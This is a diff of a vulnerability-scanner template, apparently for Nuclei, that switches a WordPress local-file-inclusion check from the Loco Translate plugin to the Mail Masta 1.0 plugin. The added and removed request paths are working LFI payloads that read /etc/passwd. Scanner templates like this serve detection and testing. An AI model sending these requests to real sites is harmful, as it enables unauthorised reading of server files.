--- a/vulnerabilities/wordpress/wp-mail-masta-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-mail-masta-lfi.yaml
@@ -1,16 +1,16 @@
-id: wp-loco-translate-lfi
+id: wp-mail-masta-lfi
 
 info:
-  name: WordPress Plugin Loco Translate 2.2.1 - Local File Inclusion
+  name: WordPress Plugin Mail Masta 1.0 - Local File Inclusion
   author: 0x240x23elu
   severity: high
-  reference: https://www.exploit-db.com/exploits/46619
+  reference: https://www.exploit-db.com/exploits/40290
   tags: wordpress,wp-plugin,lfi
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view"
+      - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
 
     matchers:
       - type: regex
